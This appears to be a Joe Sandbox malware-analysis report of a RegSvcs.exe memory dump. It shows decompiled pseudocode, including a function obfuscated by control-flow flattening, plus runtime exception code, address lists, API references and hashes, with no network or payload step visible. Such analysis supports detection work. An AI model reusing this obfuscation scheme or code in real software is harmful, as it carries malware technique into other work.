											 *((intOrPtr*)(E00443C86(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E00443C86(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E004470A6(_t204, _t225, _t202);
											E00450691(_a8, _a16, _t218);
											_t166 = E004506A9(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E00450A80(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x00450e2f
0x00450e38
0x00450e41
0x00450e47
0x00450e4f
0x00450e51
0x00450e54
0x00450e5a
0x004511ce
0x004511ce
0x004511d3
0x004511d7
0x004511db
0x004511dc
0x004511df
0x004511e0
0x004511e1
0x004511e4
0x004511e6
0x004511e9
0x004511ea
0x004511eb
0x004511ee
0x004511f3
0x004511f3
0x004511f6
0x004511f9
0x004511fb
0x004511fd
0x004511fd
0x00451203
0x00451208
0x0045120b
0x0045120d
0x00451210
0x00451213
0x00451214
0x00451222
0x00451227
0x0045122c
0x0045122f
0x00451232
0x00451235
0x00451238
0x00451239
0x0045123c
0x00451244
0x00451246
0x0045124a
0x00000000
0x0045124a
0x00451253
0x00450e69
0x00450e69
0x00450e72
0x00450f6f
0x00450f6f
0x00450f72
0x00000000
0x00450ea1
0x00450ea1
0x00450ea6
0x00000000
0x00450eac
0x00450eac
0x00450eb4
0x0045116c
0x0045116c
0x00450eba
0x00450ebf
0x00450ec2
0x00450ec7
0x00450ece
0x00450ed3
0x00000000
0x00450f0b
0x00450f13
0x00450f77
0x00450f77
0x00450f7a
0x00450f7d
0x00450f7f
0x00450f82
0x00450f85
0x00450f8b
0x00451137
0x00451137
0x0045113a
0x00000000
0x0045113c
0x0045113c
0x0045113f
0x00000000
0x00451145
0x00451155
0x0045115a
0x00000000
0x0045115a
0x0045113f
0x00450f91
0x00450f91
0x00450f95
0x00000000
0x00450f9b
0x00450f9b
0x00450fa2
0x00450fba
0x00450fba
0x00450fbd
0x00450fc0
0x00450fd6
0x00450fdb
0x00450fde
0x00450fe1
0x00450fe4
0x00450fe7
0x00450fea
0x00450fed
0x00450ff3
0x00450ff3
0x00450ff6
0x00450ff9
0x00451008
0x00451009
0x00451009
0x0045100b
0x0045100e
0x00451014
0x00451017
0x0045101d
0x0045101f
0x00451022
0x00451025
0x0045102b
0x0045102e
0x00451033
0x00451033
0x00451036
0x00451039
0x0045103c
0x0045103f
0x00451042
0x00451047
0x00451048
0x00451049
0x0045104a
0x0045104b
0x0045104e
0x00451051
0x00451053
0x00000000
0x00451055
0x00451055
0x0045105c
0x00451061
0x00451064
0x00451066
0x00000000
0x00000000
0x00451068
0x0045106b
0x0045106c
0x0045106f
0x00451071
0x00000000
0x00451073
0x00451073
0x00451076
0x00000000
0x00451076
0x00000000
0x00451071
0x0045108a
0x00451090
0x00451093
0x00451096
0x00451099
0x0045109a
0x0045109f
0x004510a0
0x004510a3
0x004510a6
0x004510a9
0x004510ac
0x004510ad
0x004510b2
0x004510b2
0x004510b5
0x004510b5
0x00000000
0x00451079
0x00451079
0x0045107a
0x0045107d
0x00451080
0x00451083
0x00451083
0x00000000
0x00451088
0x00451025
0x00451017
0x004510b8
0x004510bb
0x004510bc
0x004510bf
0x004510c2
0x004510c5
0x004510c8
0x004510c8
0x004510d1
0x004510d4
0x004510d4
0x00450fed
0x004510d7
0x004510db
0x004510dd
0x004510e0
0x004510e6
0x004510e6
0x004510ee
0x004510f3
0x0045115d
0x0045115d
0x00451162
0x00451166
0x00000000
0x00000000
0x00000000
0x00000000
0x004510f5
0x004510f8
0x004510fb
0x004510ff
0x0045110d
0x0045110f
0x00451126
0x0045112a
0x00451130
0x00451131
0x00451133
0x00000000
0x00451135
0x00000000
0x00451135
0x00000000
0x00000000
0x00000000
0x00451101
0x00451101
0x00451103
0x00000000
0x00451105
0x00451105
0x00451109
0x00000000
0x0045110b
0x00451111
0x00451116
0x00451119
0x0045111e
0x00451121
0x00000000
0x00451121
0x00451109
0x00451103
0x004510ff
0x00450fa4
0x00450fa4
0x00450fab
0x00000000
0x00450fad
0x00450fad
0x00450fb4
0x00000000
0x00000000
0x00000000
0x00000000
0x00450fb4
0x00450fab
0x00450fa2
0x00450f95
0x00450f15
0x00450f1d
0x00450f20
0x00450f25
0x00450f29
0x00450f2c
0x00450f32
0x00450f35
0x00000000
0x00450f37
0x00450f37
0x00450f3a
0x00450f3c
0x0045116d
0x0045116d
0x00000000
0x00450f42
0x00450f4a
0x00450f55
0x00000000
0x00000000
0x00450f5e
0x00450f61
0x00450f62
0x00450f65
0x00450f67
0x00000000
0x00450f6d
0x00000000
0x00450f6d
0x00000000
0x00450f67
0x00450f42
0x00451172
0x00451172
0x00451174
0x00451175
0x0045117c
0x0045117f
0x0045118d
0x00451192
0x00451197
0x0045119a
0x0045119f
0x004511a2
0x004511a5
0x004511a7
0x004511a9
0x004511a9
0x004511ae
0x004511ba
0x004511c0
0x004511c5
0x004511c8
0x004511c9
0x00000000
0x004511c9
0x00450f35
0x00450f13
0x00450ed3
0x00450eb4
0x00450ea6
0x00450e72

APIs

type_info::operator==.LIBVCRUNTIME ref: 00450F4E
CatchIt.LIBVCRUNTIME ref: 004510AD
_UnwindNestedFrames.LIBCMT ref: 004511AE
CallUnexpected.LIBVCRUNTIME ref: 004511C9

Strings

csm, xrefs: 00450ED9
csm, xrefs: 00450E6C
csm, xrefs: 00450F85

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2332921423-393685449
Opcode ID: be7d7957c7a2f331ce07e8aac5fe10177e6145e43127d9f8ecdfc0b329c96829
Instruction ID: 3cd1ee86dde39a708c63b79590df32d46eb3a275573133a64536bed24e1c0b88
Opcode Fuzzy Hash: be7d7957c7a2f331ce07e8aac5fe10177e6145e43127d9f8ecdfc0b329c96829
Instruction Fuzzy Hash: 51B19D75800609DFDF24DF95C881AAEB7B5BF08316F14405BED016B222D338DA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004259A9 Relevance: 12.2, APIs: 8, Instructions: 245
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004259A9(void* __edx, WCHAR** _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				unsigned int _v52;
				intOrPtr _t46;
				intOrPtr _t47;
				signed int _t58;
				signed int _t65;
				WCHAR* _t66;
				WCHAR* _t72;
				WCHAR** _t81;
				signed int _t83;
				WCHAR* _t86;
				signed int _t87;
				intOrPtr* _t90;

				_t84 = __edx;
				_t90 =  &_v40;
				_t81 = _a4;
				 *_t90 = 0xd3455974;
				_t87 = _v32;
				_t86 = "/";
				while(1) {
					_t46 =  *_t90;
					if(_t46 > 0xe1fbda46) {
					}
					L2:
					if(_t46 <= 0x5508550) {
						__eflags = _t46 - 0xf811430c;
						if(_t46 > 0xf811430c) {
							__eflags = _t46 - 0xf811430d;
							if(__eflags == 0) {
								lstrcatW(_v44, "\\");
								lstrcatW(_v44, _a8);
								_t65 = E0040AACC(_t84, __eflags, _v44);
								_t90 = _t90 + 4;
								_v28 = _t65;
								 *_t90 = 0x71034d87;
							} else {
								__eflags = _t46 - 0xfb4b333a;
								if(_t46 == 0xfb4b333a) {
									 *_t90 = 0x9e373215;
									_t87 = 0;
								} else {
									__eflags = _t46 - 0xfb8076a4;
									if(_t46 == 0xfb8076a4) {
										_v36 = 0;
										 *_t90 = 0x9c1351a6;
									}
								}
							}
						} else {
							__eflags = _t46 - 0xe1fbda47;
							if(_t46 == 0xe1fbda47) {
								_push(2);
								_push(0x104);
								_t66 = E0043EBC9();
								_t90 = _t90 + 8;
								_v48 = _t66;
								lstrcatW(_v48,  *_t81);
								lstrcatW(_v48, _t86);
								lstrcatW(_v48, _t81[1]);
								lstrcatW(_v48, _t86);
								lstrcatW(_v48, _a8);
								 *_t90 = 0xd0c2f7c5;
							} else {
								__eflags = _t46 - 0xf66a3a0b;
								if(_t46 == 0xf66a3a0b) {
									_push(2);
									_push(0x104);
									_t72 = E0043EBC9();
									_t90 = _t90 + 8;
									_v44 = _t72;
									lstrcatW(_v44, _t81[2]);
									 *_t90 = 0xf811430d;
								} else {
									__eflags = _t46 - 0xf76d8a21;
									if(_t46 == 0xf76d8a21) {
										_v20 = _v36;
										 *_t90 = 0xce8f1e7b;
									}
								}
							}
						}
						while(1) {
							_t46 =  *_t90;
							if(_t46 > 0xe1fbda46) {
							}
							goto L8;
						}
						goto L2;
					}
					if(_t46 > 0x3e390d84) {
						__eflags = _t46 - 0x3e390d85;
						if(_t46 == 0x3e390d85) {
							 *_t90 = 0xdd3fcad2;
							continue;
						}
						__eflags = _t46 - 0x401cbff9;
						if(_t46 == 0x401cbff9) {
							_v52 = 0xffffe20f + _v52 * 0x7a;
							 *_t90 = 0xe1fbda47;
							continue;
						}
						__eflags = _t46 - 0x71034d87;
						if(_t46 == 0x71034d87) {
							__eflags = _v28;
							_t47 = 0x1c38c35f;
							if(_v28 != 0) {
								_t47 = 0x401cbff9;
							}
							L61:
							 *_t90 = _t47;
						}
						continue;
					}
					if(_t46 <= 0x20de22a7) {
						__eflags = _t46 - 0x5508551;
						if(_t46 != 0x5508551) {
							__eflags = _t46 - 0x1c38c35f;
							if(_t46 != 0x1c38c35f) {
								continue;
							}
							_v32 = _t87;
							return _t46;
						}
						 *_t90 = 0xf76d8a21;
					} else {
						if(_t46 == 0x20de22a8) {
							_v52 = (_v52 + _v52 * 2 << 0xe) + 0xffe1c000;
							 *_t90 = 0x5508551;
						} else {
							if(_t46 == 0x3ab05a9a) {
								_v40 = 0;
								 *_t90 = 0x3e390d85;
							}
						}
					}
					continue;
					L8:
					__eflags = _t46 - 0xc8c246fa;
					if(_t46 > 0xc8c246fa) {
						__eflags = _t46 - 0xd3455973;
						if(_t46 > 0xd3455973) {
							__eflags = _t46 - 0xd3455974;
							if(_t46 == 0xd3455974) {
								L55:
								 *_t90 = 0xf66a3a0b;
								continue;
							}
							__eflags = _t46 - 0xd4ae3d9d;
							if(_t46 == 0xd4ae3d9d) {
								_t87 = _t87 + 0xab;
								_t47 = 0xf66a3a0b;
								__eflags = _t87 - 0xf6;
								if(_t87 != 0xf6) {
									_t47 = 0xe1fbda47;
								}
								goto L61;
							}
							__eflags = _t46 - 0xdd3fcad2;
							if(_t46 == 0xdd3fcad2) {
								 *_t90 = 0xc8c246fb;
							}
						} else {
							__eflags = _t46 - 0xc8c246fb;
							if(_t46 == 0xc8c246fb) {
								E0040A6C7(_v44,  &_v36,  &_v40);
								_t90 = _t90 + 0xc;
								_v24 = _v40;
								 *_t90 = 0x20de22a8;
							} else {
								__eflags = _t46 - 0xce8f1e7b;
								if(_t46 == 0xce8f1e7b) {
									 *_t90 = 0xa8f76dc7;
								} else {
									__eflags = _t46 - 0xd0c2f7c5;
									if(_t46 == 0xd0c2f7c5) {
										 *_t90 = 0xfb8076a4;
									}
								}
							}
						}
						continue;
					}
					__eflags = _t46 - 0x9e373214;
					if(_t46 > 0x9e373214) {
						__eflags = _t46 - 0x9e373215;
						if(_t46 == 0x9e373215) {
							_t87 = _t87 >> 0xf;
							__eflags = _t87;
							E004259A9(_t84, _t87, 0x2a82, 0x1365);
							E00425DFA(_t87, 0x5a29);
							_t90 = _t90 + 0x14;
							goto L55;
						}
						__eflags = _t46 - 0xa8f76dc7;
						if(_t46 == 0xa8f76dc7) {
							E0041A37A(_t84, _a12, _v48, _v20, _v24);
							E0043F602(_v48);
							E0043F602(_v44);
							_t90 = _t90 + 0x18;
							 *_t90 = 0x8db9f31a;
							continue;
						}
						__eflags = _t46 - 0xc306e8ff;
						if(_t46 != 0xc306e8ff) {
							continue;
						}
						_t87 = _t87 * 0x394000;
						_t47 = 0xd4ae3d9d;
						__eflags = _t87;
						if(_t87 != 0) {
							_t47 = 0x71034d87;
						}
						goto L61;
					}
					__eflags = _t46 - 0x8db9f31a;
					if(_t46 == 0x8db9f31a) {
						_t58 = _v52 >> 4;
						_t83 = _t58 * _t58;
						_t84 = _t83 * 0x1bfd - 1;
						_v52 = _t58 + 0xffffffd7;
						_t47 = 0xe1fbda47;
						__eflags = _t83 * 0x1bfd - 1 - _t83;
						if(_t83 * 0x1bfd - 1 != _t83) {
							_t47 = 0x1c38c35f;
						}
						goto L61;
					} else {
						__eflags = _t46 - 0x9a800166;
						if(_t46 == 0x9a800166) {
							_t87 = 0xffffffde + _t87 * 0xe9000;
							_push(_t87);
							_push(0x2afd);
							_push(0x2fea);
							E00426021(_t84);
							_t90 = _t90 + 0xc;
							 *_t90 = 0xf811430d;
						} else {
							__eflags = _t46 - 0x9c1351a6;
							if(_t46 == 0x9c1351a6) {
								_v52 = 0xffffffb7 + _v52 * 0x4eea;
								 *_t90 = 0x3ab05a9a;
							}
						}
						continue;
					}
				}
			}

0x004259a9
0x004259ad
0x004259b0
0x004259b4
0x004259bb
0x004259c5
0x004259ca
0x004259ca
0x004259d2
0x004259d2
0x004259d4
0x004259d9
0x00425a6a
0x00425a6f
0x00425b5b
0x00425b60
0x00425d8d
0x00425d97
0x00425d9d
0x00425da2
0x00425da5
0x00425da9
0x00425b66
0x00425b66
0x00425b6b
0x00425db5
0x00425dbc
0x00425b71
0x00425b71
0x00425b76
0x00425b7c
0x00425b84
0x00425b84
0x00425b76
0x00425b6b
0x00425a75
0x00425a75
0x00425a7a
0x00425c4c
0x00425c4e
0x00425c53
0x00425c58
0x00425c5b
0x00425c65
0x00425c6c
0x00425c75
0x00425c7c
0x00425c86
0x00425c88
0x00425a80
0x00425a80
0x00425a85
0x00425c94
0x00425c96
0x00425c9b
0x00425ca0
0x00425ca3
0x00425cae
0x00425cb0
0x00425a8b
0x00425a8b
0x00425a90
0x00425a9a
0x00425a9e
0x00425a9e
0x00425a90
0x00425a85
0x00425a7a
0x004259ca
0x004259ca
0x004259d2
0x004259d2
0x00000000
0x004259d2
0x00000000
0x004259ca
0x004259e4
0x00425ae2
0x00425ae7
0x00425cf2
0x00000000
0x00425cf2
0x00425aed
0x00425af2
0x00425d08
0x00425d0c
0x00000000
0x00425d0c
0x00425af8
0x00425afd
0x00425b03
0x00425b08
0x00425b0d
0x00425b13
0x00425b13
0x00425ddb
0x00425ddb
0x00425ddb
0x00000000
0x00425afd
0x004259ef
0x00425bbd
0x00425bc2
0x00425de3
0x00425de8
0x00000000
0x00000000
0x00425dee
0x00425df9
0x00425df9
0x00425bc8
0x004259f5
0x004259fa
0x00425be3
0x00425be7
0x00425a00
0x00425a05
0x00425a07
0x00425a0f
0x00425a0f
0x00425a05
0x004259fa
0x00000000
0x00425a18
0x00425a18
0x00425a1d
0x00425aaa
0x00425aaf
0x00425b90
0x00425b95
0x00425d3c
0x00425d3c
0x00000000
0x00425d3c
0x00425b9b
0x00425ba0
0x00425dc3
0x00425dc9
0x00425dce
0x00425dd4
0x00425dd6
0x00425dd6
0x00000000
0x00425dd4
0x00425ba6
0x00425bab
0x00425bb1
0x00425bb1
0x00425ab5
0x00425ab5
0x00425aba
0x00425cca
0x00425ccf
0x00425cd6
0x00425cda
0x00425ac0
0x00425ac0
0x00425ac5
0x00425ce6
0x00425acb
0x00425acb
0x00425ad0
0x00425ad6
0x00425ad6
0x00425ad0
0x00425ac5
0x00425aba
0x00000000
0x00425aaf
0x00425a23
0x00425a28
0x00425b1d
0x00425b22
0x00425d18
0x00425d18
0x00425d26
0x00425d34
0x00425d39
0x00000000
0x00425d39
0x00425b28
0x00425b2d
0x00425d58
0x00425d64
0x00425d70
0x00425d75
0x00425d78
0x00000000
0x00425d78
0x00425b33
0x00425b38
0x00000000
0x00000000
0x00425b3e
0x00425b44
0x00425b49
0x00425b4b
0x00425b51
0x00425b51
0x00000000
0x00425b4b
0x00425a2e
0x00425a33
0x00425bf7
0x00425bfc
0x00425c05
0x00425c09
0x00425c0d
0x00425c12
0x00425c14
0x00425c1a
0x00425c1a
0x00000000
0x00425a39
0x00425a39
0x00425a3e
0x00425c2a
0x00425c2d
0x00425c2e
0x00425c33
0x00425c38
0x00425c3d
0x00425c40
0x00425a44
0x00425a44
0x00425a49
0x00425a5a
0x00425a5e
0x00425a5e
0x00425a49
0x00000000
0x00425a3e
0x00425a33

APIs

lstrcatW.KERNEL32(?,?), ref: 00425C65
lstrcatW.KERNEL32(?,00455110), ref: 00425C6C
lstrcatW.KERNEL32(?,?), ref: 00425C75
lstrcatW.KERNEL32(?,00455110), ref: 00425C7C
lstrcatW.KERNEL32(?,?), ref: 00425C86
lstrcatW.KERNEL32(?,?), ref: 00425CAE
lstrcatW.KERNEL32(?,0045515A), ref: 00425D8D
lstrcatW.KERNEL32(?,?), ref: 00425D97

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcat
String ID:
API String ID: 4038537762-0
Opcode ID: 016e164af26aecf7ac9aa42c5bf63e9dc6a9f80521902e58a5a07ed5880848fa
Instruction ID: 2a767c58419c2930859bbfeee0e08d486897bc267a364928ec5a9d5b3a997d15
Opcode Fuzzy Hash: 016e164af26aecf7ac9aa42c5bf63e9dc6a9f80521902e58a5a07ed5880848fa
Instruction Fuzzy Hash: C89107F1608B21DBCB205F15E88593EBAB0AF44314FA48D2FF489D6261D37DC8819B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00401C4E Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 395
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401C4E(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _t62;

				_t62 = E0040174D(__ecx) - 1;
				if(_t62 > 5) {
					L109:
					return 0xffffffffffffffff;
				}
				switch( *((intOrPtr*)(_t62 * 4 +  &M0045551C))) {
					case 0:
						_t69 = __edx;
						goto L29;
					case 1:
						__eax = E0040151D(__eflags, __esi);
						__eflags = __eax;
						if(__eflags == 0) {
							goto L109;
						}
						__ebx = __eax;
						__eax = E00401530(__eflags, __esi);
						__ecx = __ebx;
						__edx = __eax;
						__eax = E0040697F(__eax, __ebx, __eax, __edi);
						goto L30;
					case 2:
						__eax = E0040155E(__eflags, __fp0, __esi);
						__eflags = __edi;
						if(__edi != 0) {
							__ebx = __edi;
						}
						__ecx =  *0x460bd0; // 0x0
						__eax = "%1.17g";
						__eflags = __ecx;
						if(__ecx != 0) {
							__eax = __ecx;
						}
						__esp = __esp - 0x10;
						__esp[2] = __fp0;
						__esp[1] = __eax;
						 *__esp = __ebx;
						__eax = E0040112C(__eax);
						__esp =  &(__esp[4]);
						goto L30;
					case 3:
						__esp[2] = E0040157A(__eflags, __esi);
						__ebx = __eax;
						__ecx = __edi;
						__edx = 0x45542b;
						__eax = E00406926(__edi, 0x45542b);
						__eflags = __eax;
						if(__eax < 0) {
							goto L109;
						}
						__esi = __eax;
						__eflags = __edi;
						if(__edi != 0) {
							__edi = __edi + __esi;
							__eflags = __edi;
						}
						__ecx = __esp[0xb];
						__eflags = __ebx;
						__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
						__eflags = __ecx;
						__ecx = __ecx & 0xffffff00 | __ecx != 0x00000000;
						__cl = __cl & __al;
						__esp[0] = __cl;
						__eflags = __cl - 1;
						__esp[1] = __ebx;
						if(__cl != 1) {
							__eax = __ebx;
							__ebx = __esi;
							__eflags = __eax;
							if(__eax == 0) {
								goto L106;
							}
							goto L33;
						} else {
							__ecx = __edi;
							__edx = 0x455042;
							__eax = E00406926(__edi, 0x455042);
							__eflags = __eax;
							if(__eax < 0) {
								goto L109;
							}
							__ebx = __eax;
							__eflags = __edi;
							if(__edi != 0) {
								__edi = __edi + __ebx;
								__eflags = __edi;
							}
							__ebx = __ebx + __esi;
							L33:
							__eax = E004016BA(__esp[3], 0);
							__eflags = __eax;
							if(__eax == 0) {
								goto L68;
							}
							__esi = __eax;
							__esp[0xa] = __esp[0xa] + 1;
							__esp[3] = __esp[0xa] + 1;
							__esp[1] = __esp[1] - 1;
							__esp[4] = __esp[1] - 1;
							__ebp = 0;
							__eflags = 0;
							do {
								__eflags = __esp[0xb];
								if(__esp[0xb] == 0) {
									L40:
									__eax = E00440010(__esi);
									__ecx = __esi;
									__edx = __eax;
									__eax = E0040697F(__eax, __esi, __eax, __edi);
									__eflags = __eax;
									if(__eax < 0) {
										goto L68;
									}
									__esi = __eax;
									__eflags = __edi;
									if(__edi != 0) {
										__edi = __edi + __esi;
										__eflags = __edi;
									}
									__ecx = __edi;
									__edx = 0x45542d;
									__eax = E00406926(__edi, 0x45542d);
									__eflags = __eax;
									if(__eax < 0) {
										goto L68;
									} else {
										__esi = __esi + __ebx;
										__eflags = __edi;
										if(__edi != 0) {
											__edi = __edi + __eax;
											__eflags = __edi;
										}
										__ebx = __esp[0xc];
										__ecx = __esp[0xb];
										__esi = __esi + __eax;
										__eflags = __esp[0xb];
										if(__esp[0xb] == 0) {
											L51:
											__ecx = E004016E4(__esp[3], __ebp);
											__edx = __edi;
											_push(__ebx);
											_push(__esp[0xc]);
											_push(__esp[5]);
											__eax = E00401C4E(__eax, __edi, __eflags, __fp0);
											__esp =  &(__esp[3]);
											__eflags = __eax;
											if(__eax < 0) {
												goto L68;
											}
											__ebx = __eax;
											__eflags = __edi;
											if(__edi != 0) {
												__edi = __edi + __ebx;
												__eflags = __edi;
											}
											__ebx = __ebx + __esi;
											__eflags = __ebp - __esp[4];
											if(__ebp >= __esp[4]) {
												__ecx = __esp[0xb];
												goto L60;
											} else {
												__ecx = __edi;
												__edx = 0x455427;
												__eax = E00406926(__edi, 0x455427);
												__eflags = __eax;
												if(__eax < 0) {
													goto L68;
												}
												__eflags = __edi;
												if(__edi != 0) {
													__edi = __edi + __eax;
													__eflags = __edi;
												}
												__ecx = __esp[0xb];
												__ebx = __ebx + __eax;
												L60:
												__eflags = __ecx;
												if(__ecx == 0) {
													L66:
													__ebp = __ebp + 1;
													__eflags = __ebp - __esp[1];
													if(__ebp == __esp[1]) {
														L106:
														__ecx = __edi;
														__edx = 0x455431;
														goto L107;
													}
													goto L67;
												}
												__ecx = __edi;
												__edx = 0x455042;
												__eax = E00406926(__edi, 0x455042);
												__eflags = __eax;
												if(__eax < 0) {
													goto L68;
												}
												__eflags = __edi;
												__edx = __esp[0xa];
												if(__edi != 0) {
													__edi = __edi + __eax;
													__eflags = __edi;
												}
												__ebx = __ebx + __eax;
												__ebp = __ebp + 1;
												__eflags = __ebp - __esp[1];
												if(__ebp != __esp[1]) {
													goto L67;
												} else {
													__eflags = __esp[0];
													if(__esp[0] != 0) {
														__ecx = __edi;
														__eax = E00406944(__edi, __edx);
														__eflags = __eax;
														__ebp = 0xffffffff;
														if(__eax < 0) {
															goto L109;
														}
														__eflags = __edi;
														if(__edi != 0) {
															__edi = __edi + __eax;
															__eflags = __edi;
														}
														__ebx = __ebx + __eax;
														__eflags = __ebx;
													}
													goto L106;
												}
											}
										} else {
											__ecx = __edi;
											__edx = 0x45542f;
											__eax = E00406926(__edi, 0x45542f);
											__eflags = __eax;
											if(__eax < 0) {
												goto L68;
											}
											__eflags = __edi;
											if(__edi != 0) {
												__edi = __edi + __eax;
												__eflags = __edi;
											}
											__esi = __esi + __eax;
											__eflags = __esi;
											goto L51;
										}
									}
								}
								__ecx = __edi;
								__edx = __esp[3];
								__eax = E00406944(__edi, __esp[3]);
								__eflags = __eax;
								if(__eax < 0) {
									goto L68;
								}
								__eflags = __edi;
								if(__edi != 0) {
									__edi = __edi + __eax;
									__eflags = __edi;
								}
								__ebx = __ebx + __eax;
								__eflags = __ebx;
								goto L40;
								L67:
								__eax = E004016BA(__esp[3], __ebp);
								__esi = __eax;
								__eflags = __eax;
							} while (__eax != 0);
							goto L68;
						}
					case 4:
						__esp[3] = E004015B0(__eflags, __esi);
						__esi = __eax;
						__ecx = __edi;
						__edx = 0x455425;
						__eax = E00406926(__edi, 0x455425);
						__eflags = __eax;
						if(__eax < 0) {
							goto L109;
						}
						__ebx = __eax;
						__eflags = __edi;
						if(__edi != 0) {
							__edi = __edi + __ebx;
							__eflags = __edi;
						}
						__ecx = __esp[0xb];
						__eflags = __esi;
						__eax = __eax & 0xffffff00 | __esi != 0x00000000;
						__eflags = __ecx;
						__edx = __edx & 0xffffff00 | __ecx != 0x00000000;
						__dl = __dl & __al;
						__esp[0] = __dl;
						__eflags = __dl - 1;
						__esp[1] = __esi;
						if(__dl != 1) {
							__eax = __esi;
							__esi = __ebx;
							__eflags = __eax;
							if(__eax == 0) {
								goto L100;
							}
							goto L70;
						} else {
							__ecx = __edi;
							__edx = 0x455042;
							__eax = E00406926(__edi, 0x455042);
							__eflags = __eax;
							if(__eax < 0) {
								goto L109;
							}
							__esi = __eax;
							__eflags = __edi;
							if(__edi != 0) {
								__edi = __edi + __esi;
								__eflags = __edi;
							}
							__ecx = __esp[0xb];
							__esi = __esi + __ebx;
							L70:
							__esp[0xa] = __esp[0xa] + 1;
							__esp[2] = __esp[0xa] + 1;
							__esp[1] = __esp[1] - 1;
							__esp[4] = __esp[1] - 1;
							__ebp = 0;
							__eflags = 0;
							goto L71;
							do {
								do {
									L71:
									__eflags = __ecx;
									if(__ecx == 0) {
										__ebx = __esp[0xc];
										L77:
										__ecx = E0040175D(__esp[4], __ebp);
										__edx = __edi;
										_push(__ebx);
										_push(__esp[0xc]);
										_push(__esp[4]);
										__eax = E00401C4E(__eax, __edi, __eflags, __fp0);
										__esp =  &(__esp[3]);
										__eflags = __eax;
										if(__eax < 0) {
											L68:
											0 = 0xffffffffffffffff;
											goto L109;
										}
										__ebx = __eax;
										__eflags = __edi;
										if(__edi != 0) {
											__edi = __edi + __ebx;
											__eflags = __edi;
										}
										__ebx = __ebx + __esi;
										__eflags = __ebp - __esp[4];
										if(__ebp >= __esp[4]) {
											__ecx = __esp[0xb];
											goto L86;
										} else {
											__ecx = __edi;
											__edx = 0x455427;
											__eax = E00406926(__edi, 0x455427);
											__eflags = __eax;
											if(__eax < 0) {
												goto L68;
											}
											__eflags = __edi;
											if(__edi != 0) {
												__edi = __edi + __eax;
												__eflags = __edi;
											}
											__ecx = __esp[0xb];
											__ebx = __ebx + __eax;
											L86:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L92;
											}
											__ecx = __edi;
											__edx = 0x455042;
											__eax = E00406926(__edi, 0x455042);
											__eflags = __eax;
											if(__eax < 0) {
												goto L68;
											}
											goto L88;
										}
									}
									__ecx = __edi;
									__edx = __esp[2];
									__eax = E00406944(__edi, __esp[2]);
									__eflags = __eax;
									__ebx = __esp[0xc];
									if(__eax < 0) {
										goto L68;
									}
									__eflags = __edi;
									if(__edi != 0) {
										__edi = __edi + __eax;
										__eflags = __edi;
									}
									__esi = __esi + __eax;
									goto L77;
									L92:
									__ebp = __ebp + 1;
									__esi = __ebx;
									__eflags = __ebp - __esp[1];
								} while (__ebp != __esp[1]);
								L100:
								__ecx = __edi;
								__edx = 0x455429;
								L107:
								__eax = E00406926(__ecx, __edx);
								__eflags = __eax;
								__ebp = 0xffffffff;
								if(__eax >= 0) {
									__eax = __eax + __ebx;
									__eflags = __eax;
									__ebp = __eax;
								}
								goto L109;
								L88:
								__esi = __eax;
								__eflags = __edi;
								if(__edi != 0) {
									__edi = __edi + __esi;
									__eflags = __edi;
								}
								__ecx = __esp[0xb];
								__esi = __esi + __ebx;
								__ebp = __ebp + 1;
								__eflags = __ebp - __esp[1];
							} while (__ebp != __esp[1]);
							__eflags = __esp[0];
							if(__esp[0] == 0) {
								__ebx = __esi;
							} else {
								__ecx = __edi;
								__edx = __esp[0xa];
								__eax = E00406944(__edi, __esp[0xa]);
								__eflags = __eax;
								__ebp = 0xffffffff;
								if(__eax < 0) {
									goto L109;
								}
								__ebx = __eax;
								__eflags = __edi;
								if(__edi != 0) {
									__edi = __edi + __ebx;
									__eflags = __edi;
								}
								__ebx = __ebx + __esi;
							}
							goto L100;
						}
					case 5:
						__eax = E004015E6(__eflags, __esi);
						__ecx = __edi;
						__eflags = __eax;
						if(__eax == 0) {
							__edx = 0x455414;
						} else {
							__edx = 0x45540f;
						}
						L29:
						_t64 = E00406926(_t69, 0x455420);
						L30:
						if(_t64 < 0) {
							return 0xffffffffffffffff;
						}
						return _t64;
				}
			}

0x00401c65
0x00401c69
0x004020d8
0x00000000
0x004020d8
0x00401c73
0x00000000
0x00401c7a
0x00000000
0x00000000
0x00401c87
0x00401c8f
0x00401c91
0x00000000
0x00000000
0x00401c97
0x00401c9a
0x00401ca2
0x00401ca4
0x00401ca7
0x00000000
0x00000000
0x00401cb5
0x00401cbd
0x00401cbf
0x00401cc1
0x00401cc1
0x00401cc3
0x00401cc9
0x00401cce
0x00401cd0
0x00401cd2
0x00401cd2
0x00401cd4
0x00401cd7
0x00401cdb
0x00401cdf
0x00401ce2
0x00401ce7
0x00000000
0x00000000
0x00401cf8
0x00401d05
0x00401d07
0x00401d09
0x00401d0e
0x00401d13
0x00401d15
0x00000000
0x00000000
0x00401d1b
0x00401d1d
0x00401d1f
0x00401d21
0x00401d21
0x00401d21
0x00401d23
0x00401d27
0x00401d29
0x00401d2c
0x00401d2e
0x00401d31
0x00401d33
0x00401d37
0x00401d3a
0x00401d3e
0x00401e13
0x00401e15
